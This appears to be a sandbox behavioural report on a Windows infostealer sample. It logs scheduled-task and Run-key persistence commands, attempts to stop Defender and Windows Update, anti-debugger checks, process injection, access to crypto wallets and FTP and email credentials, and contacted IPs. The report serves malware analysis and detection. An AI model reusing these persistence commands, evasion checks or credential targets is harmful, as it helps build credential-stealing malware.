RegOpenKeyExA Feb. 16, 2024, 7:57 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 16, 2024, 7:57 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x0000052c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 16, 2024, 7:57 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x0000052c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 16, 2024, 7:57 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x0000052c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 16, 2024, 7:57 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000520 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 16, 2024, 7:57 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000520 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 16, 2024, 7:57 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x0000052c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 16, 2024, 7:57 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x0000052c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 16, 2024, 7:57 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x0000052c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 16, 2024, 7:57 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x0000052c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 16, 2024, 7:57 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x0000052c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 16, 2024, 7:57 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000520 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 16, 2024, 7:57 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000520 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 16, 2024, 7:57 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4} base_handle: 0x80000002 key_handle: 0x00000520 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}	1
RegOpenKeyExA Feb. 16, 2024, 7:57 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40} base_handle: 0x80000002 key_handle: 0x00000520 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}	1
RegOpenKeyExA Feb. 16, 2024, 7:57 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d} base_handle: 0x80000002 key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}	1

Uses Windows utilities for basic Windows functionality (4 events)

cmdline	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:1728 CREDAT:145409
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
cmdline	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST

Communicates with host for which no DNS query was performed (3 events)

host	117.18.232.200
host	185.215.113.46
host	193.233.132.62

Allocates execute permission to another process indicative of possible code injection (4 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Feb. 16, 2024, 7:58 a.m.	process_identifier: 3688 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d81000 process_handle: 0x0000000000000050	1
NtProtectVirtualMemory Feb. 16, 2024, 7:58 a.m.	process_identifier: 3688 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d57000 process_handle: 0x0000000000000050	1
NtProtectVirtualMemory Feb. 16, 2024, 7:51 a.m.	process_identifier: 3856 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d81000 process_handle: 0x0000000000000050	1
NtProtectVirtualMemory Feb. 16, 2024, 7:51 a.m.	process_identifier: 3856 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d57000 process_handle: 0x0000000000000050	1

Attempts to stop active services (2 events)

Time & API	Arguments	Status	Return	Repeated
ControlService Feb. 16, 2024, 7:58 a.m.	service_handle: 0x005439c8 service_name: WinDefend control_code: 1		0	0
ControlService Feb. 16, 2024, 7:58 a.m.	service_handle: 0x00543ec8 service_name: wuauserv control_code: 1		0	0

Checks for the presence of known devices from debuggers and forensic tools (3 events)

file	\??\SICE
file	\??\SIWVID
file	\??\NTICE

Checks for the presence of known windows from debuggers and forensic tools (50 out of 231 events)

Time & API	Arguments	Status	Return	Repeated
FindWindowA Feb. 16, 2024, 7:57 a.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA Feb. 16, 2024, 7:57 a.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA Feb. 16, 2024, 7:57 a.m.	class_name: pediy06 window_name:		0	0
FindWindowA Feb. 16, 2024, 7:57 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA Feb. 16, 2024, 7:57 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA Feb. 16, 2024, 7:57 a.m.	class_name: #0 window_name: File Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA Feb. 16, 2024, 7:57 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA Feb. 16, 2024, 7:57 a.m.	class_name: #0 window_name: Process Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA Feb. 16, 2024, 7:57 a.m.	class_name: RegmonClass window_name:		0	0
FindWindowA Feb. 16, 2024, 7:57 a.m.	class_name: RegmonClass window_name:		0	0
FindWindowA Feb. 16, 2024, 7:57 a.m.	class_name: #0 window_name: Registry Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA Feb. 16, 2024, 7:57 a.m.	class_name: 18467-41 window_name:		0	0
FindWindowA Feb. 16, 2024, 7:57 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA Feb. 16, 2024, 7:57 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA Feb. 16, 2024, 7:57 a.m.	class_name: #0 window_name: File Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA Feb. 16, 2024, 7:57 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA Feb. 16, 2024, 7:57 a.m.	class_name: #0 window_name: Process Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA Feb. 16, 2024, 7:57 a.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA Feb. 16, 2024, 7:57 a.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA Feb. 16, 2024, 7:57 a.m.	class_name: pediy06 window_name:		0	0
FindWindowA Feb. 16, 2024, 7:57 a.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA Feb. 16, 2024, 7:57 a.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA Feb. 16, 2024, 7:57 a.m.	class_name: pediy06 window_name:		0	0
FindWindowA Feb. 16, 2024, 7:57 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA Feb. 16, 2024, 7:57 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA Feb. 16, 2024, 7:57 a.m.	class_name: 18467-41 window_name:		0	0
FindWindowA Feb. 16, 2024, 7:57 a.m.	class_name: Filemonclass window_name:		0	0
FindWindowA Feb. 16, 2024, 7:57 a.m.	class_name: Filemonclass window_name:		0	0
FindWindowA Feb. 16, 2024, 7:57 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA Feb. 16, 2024, 7:57 a.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA Feb. 16, 2024, 7:57 a.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA Feb. 16, 2024, 7:57 a.m.	class_name: pediy06 window_name:		0	0
FindWindowA Feb. 16, 2024, 7:57 a.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA Feb. 16, 2024, 7:57 a.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA Feb. 16, 2024, 7:57 a.m.	class_name: pediy06 window_name:		0	0
FindWindowA Feb. 16, 2024, 7:57 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA Feb. 16, 2024, 7:57 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA Feb. 16, 2024, 7:57 a.m.	class_name: 18467-41 window_name:		0	0
FindWindowA Feb. 16, 2024, 7:57 a.m.	class_name: Filemonclass window_name:		0	0
FindWindowA Feb. 16, 2024, 7:57 a.m.	class_name: Filemonclass window_name:		0	0
FindWindowA Feb. 16, 2024, 7:57 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA Feb. 16, 2024, 7:57 a.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA Feb. 16, 2024, 7:57 a.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA Feb. 16, 2024, 7:57 a.m.	class_name: pediy06 window_name:		0	0
FindWindowA Feb. 16, 2024, 7:57 a.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA Feb. 16, 2024, 7:57 a.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA Feb. 16, 2024, 7:57 a.m.	class_name: pediy06 window_name:		0	0
FindWindowA Feb. 16, 2024, 7:57 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA Feb. 16, 2024, 7:57 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA Feb. 16, 2024, 7:57 a.m.	class_name: 18467-41 window_name:		0	0

Checks the version of Bios, possibly for anti-virtualization (2 events)

registry	HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
registry	HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion

Checks the CPU name from registry, possibly for anti-virtualization (1 event)

registry

HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString

Installs itself for autorun at Windows startup (3 events)

reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\RageMP131	reg_value	C:\Users\test22\AppData\Local\RageMP131\RageMP131.exe
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST

Attempts to access Bitcoin/ALTCoin wallets (1 event)

file	C:\Users\test22\AppData\Roaming\Electrum\wallets

Attempts to disable Windows Auto Updates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU\NoAutoUpdate

Harvests credentials from local FTP client softwares (1 event)

file	C:\Users\test22\AppData\Roaming\GHISLER\wcx_ftp.ini

Potential code injection by writing to the memory of another process (18 events)

Time & API	Arguments	Status	Return
WriteProcessMemory Feb. 16, 2024, 7:58 a.m.	buffer: base_address: 0x000000013f8322b0 process_identifier: 3688 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 16, 2024, 7:58 a.m.	buffer: base_address: 0x000000013f840d88 process_identifier: 3688 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 16, 2024, 7:58 a.m.	buffer: I»`#?Aÿã base_address: 0x0000000076d81590 process_identifier: 3688 process_handle: 0x0000000000000050	1	1
WriteProcessMemory Feb. 16, 2024, 7:58 a.m.	buffer: c base_address: 0x000000013f840d78 process_identifier: 3688 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 16, 2024, 7:58 a.m.	buffer: I» ?Aÿã base_address: 0x0000000076d57a90 process_identifier: 3688 process_handle: 0x0000000000000050	1	1
WriteProcessMemory Feb. 16, 2024, 7:58 a.m.	buffer: c base_address: 0x000000013f840d70 process_identifier: 3688 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 16, 2024, 7:58 a.m.	buffer: ÏT base_address: 0x000000013f7e0108 process_identifier: 3688 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 16, 2024, 7:58 a.m.	buffer: Øv@Øv Øv@ØvØv°Øv ÕvàTÕv 3ØvØvÀ´Óv`,ØvÀÖvöÔv YØv2ØvVØv°ÞvÕvRØv ÕvQØvÂÕv ?ÖvPÕv°TÕvàtÕvðÖvÐ1ØvÔvÐOÔv`ê×vÐæ×vÐæ×vÐ.Øv base_address: 0x000000013f83aae8 process_identifier: 3688 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 16, 2024, 7:58 a.m.	buffer: base_address: 0x000000013f840c78 process_identifier: 3688 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 16, 2024, 7:51 a.m.	buffer: base_address: 0x000000013f8322b0 process_identifier: 3856 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 16, 2024, 7:51 a.m.	buffer: base_address: 0x000000013f840d88 process_identifier: 3856 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 16, 2024, 7:51 a.m.	buffer: I»`#?Aÿã base_address: 0x0000000076d81590 process_identifier: 3856 process_handle: 0x0000000000000050	1	1
WriteProcessMemory Feb. 16, 2024, 7:51 a.m.	buffer: 8 base_address: 0x000000013f840d78 process_identifier: 3856 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 16, 2024, 7:51 a.m.	buffer: I» ?Aÿã base_address: 0x0000000076d57a90 process_identifier: 3856 process_handle: 0x0000000000000050	1	1
WriteProcessMemory Feb. 16, 2024, 7:51 a.m.	buffer: 8 base_address: 0x000000013f840d70 process_identifier: 3856 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 16, 2024, 7:51 a.m.	buffer: ÏT base_address: 0x000000013f7e0108 process_identifier: 3856 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 16, 2024, 7:51 a.m.	buffer: Øv@Øv Øv@ØvØv°Øv ÕvàTÕv 3ØvØvÀ´Óv`,ØvÀÖvöÔv YØv2ØvVØv°ÞvÕvRØv ÕvQØvÂÕv ?ÖvPÕv°TÕvàtÕvðÖvÐ1ØvÔvÐOÔv`ê×vÐæ×vÐæ×vÐ.Øv base_address: 0x000000013f83aae8 process_identifier: 3856 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 16, 2024, 7:51 a.m.	buffer: base_address: 0x000000013f840c78 process_identifier: 3856 process_handle: 0x000000000000004c	1	1

Collects information about installed applications (27 events)

Time & API	Arguments	Status
RegQueryValueExA Feb. 16, 2024, 7:57 a.m.	key_handle: 0x00000524 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExA Feb. 16, 2024, 7:57 a.m.	key_handle: 0x00000528 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Enterprise 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE\DisplayName	1
RegQueryValueExA Feb. 16, 2024, 7:57 a.m.	key_handle: 0x00000528 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExA Feb. 16, 2024, 7:57 a.m.	key_handle: 0x00000528 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: ????? ?? 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExA Feb. 16, 2024, 7:57 a.m.	key_handle: 0x00000528 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1
RegQueryValueExA Feb. 16, 2024, 7:57 a.m.	key_handle: 0x00000528 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: ????? ?? 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1
RegQueryValueExA Feb. 16, 2024, 7:57 a.m.	key_handle: 0x00000520 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Google Update Helper regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName	1
RegQueryValueExA Feb. 16, 2024, 7:57 a.m.	key_handle: 0x00000520 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Access MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 16, 2024, 7:57 a.m.	key_handle: 0x00000520 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Excel MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 16, 2024, 7:57 a.m.	key_handle: 0x00000520 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office PowerPoint MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 16, 2024, 7:57 a.m.	key_handle: 0x00000528 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Publisher MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 16, 2024, 7:57 a.m.	key_handle: 0x00000528 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Outlook MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 16, 2024, 7:57 a.m.	key_handle: 0x0000052c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Word MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 16, 2024, 7:57 a.m.	key_handle: 0x0000052c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 16, 2024, 7:57 a.m.	key_handle: 0x0000052c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 16, 2024, 7:57 a.m.	key_handle: 0x00000520 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office IME (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 16, 2024, 7:57 a.m.	key_handle: 0x00000520 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 16, 2024, 7:57 a.m.	key_handle: 0x0000052c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Enterprise 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 16, 2024, 7:57 a.m.	key_handle: 0x0000052c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office InfoPath MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 16, 2024, 7:57 a.m.	key_handle: 0x0000052c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 16, 2024, 7:57 a.m.	key_handle: 0x0000052c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 16, 2024, 7:57 a.m.	key_handle: 0x0000052c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OneNote MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 16, 2024, 7:57 a.m.	key_handle: 0x00000520 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Groove MUI (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 16, 2024, 7:57 a.m.	key_handle: 0x00000520 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Groove Setup Metadata MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 16, 2024, 7:57 a.m.	key_handle: 0x00000520 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 ActiveX regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName	1
RegQueryValueExA Feb. 16, 2024, 7:57 a.m.	key_handle: 0x00000520 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 NPAPI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName	1
RegQueryValueExA Feb. 16, 2024, 7:57 a.m.	key_handle: 0x00000528 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName	1

Harvests credentials from local email clients (5 events)

file	C:\Users\test22\AppData\Roaming\ICQ\0001
file	C:\Users\test22\AppData\Roaming\Thunderbird\profiles.ini
registry	HKEY_CURRENT_USER\Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
registry	HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
registry	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Network activity contains more than one unique useragent (2 events)

process	bugai.exe				useragent	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36
process	iexplore.exe				useragent	Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

One or more non-whitelisted processes were created (17 events)

